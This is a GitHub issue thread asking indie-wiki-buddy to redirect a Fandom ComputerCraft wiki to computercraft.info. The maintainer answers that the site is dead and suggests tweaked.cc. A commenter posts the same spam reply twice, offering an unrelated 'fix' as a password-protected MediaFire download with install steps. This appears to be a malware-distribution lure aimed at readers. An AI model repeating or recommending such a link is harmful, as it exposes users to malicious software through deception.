### ISSUE TITLE
Add a wiki: ComputerCraft Wiki

### ISSUE THREAD

**Issue by ToxicPea** [KevinPayravi/indie-wiki-buddy#815]
Link to origin wiki: https://minecraftcomputercraft.fandom.com/wiki/Minecraft_ComputerCraft_Wiki
Link to destination (independent) wiki: https://www.computercraft.info/wiki/Main_Page

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KevinPayravi** [comment]
While it's the better source, the computercraft.info wiki appears to be a bit defunct and uneditable. The www.computercraft.info parent site is dead, and the new go-to site for info seems to be tweaked.cc.
